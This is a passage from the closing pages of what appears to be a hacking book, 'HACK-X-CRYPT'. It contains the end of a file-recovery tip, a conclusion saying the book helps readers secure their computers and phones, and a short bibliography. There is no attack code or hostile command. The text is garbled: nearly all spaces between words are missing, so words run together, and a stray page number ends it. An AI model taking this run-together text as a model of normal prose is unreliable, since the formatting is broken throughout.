recoveroptiontorecoveryourdatasuccessfully.
Note:-Therecovereddatawillworkonlywhentheaddressofthatlocationisempty/notoverwrittenfromwherethatfile/folderis
deletedaccidently.
CONCLUSION:
ThanksForreadingthisbookandIhopethecontentsdescribedinthisbookwillhelpyoutoknowtheintentsofhackers.Nowyouarecapableofsecuringyourownandyoursurroundingcomputers,mobilephonesandothernetworksfromthe
Threatwecalled“HACKINGAnartofexploitation”.
BIBLIOGRAPHY
THEBIGCOMPUTING.COMHackingfordummiesHackingexposedXDAdevelopersEtc.Findoutmore@
THEBIGCOMPUTINGdotCOM
HACK-X-CRYPT
204
